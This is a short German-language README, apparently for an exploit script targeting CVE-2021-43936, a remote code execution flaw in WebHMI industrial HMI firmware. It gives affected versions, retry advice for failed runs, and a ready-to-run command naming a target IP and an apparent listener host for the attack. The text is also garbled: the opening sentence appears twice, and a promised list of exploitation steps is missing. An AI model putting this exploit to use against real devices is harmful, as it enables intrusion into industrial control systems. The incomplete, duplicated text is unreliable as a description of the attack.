
CVE-2021-43936 ist eine kritische Schwachstelle (CVSS3 10.0), die in der WebHMI-Firmware zu Remote Code Execution (RCE) führt.
CVE-2021-43936 ist eine kritische Schwachstelle (CVSS3 10.0), die zu Remote Code Execution (RCE) in WebHMI Firmware führt.
Diese Schwachstelle betrifft Version 4.0 und die neuesten Versionen.
Getestet nur auf 4.0.7475. Die Schwachstelle wird vom Skript in den folgenden Schritten ausgenutzt:
Der Exploit kann fehlschlagen, wenn mehr als eine Netzwerkschnittstelle angeschlossen ist. Die Lösung besteht darin, es erneut zu versuchen.
python3 cve-2021-43936.py -t 10.100.23.200 -p 80 -l 10.100.23.201 -P 80
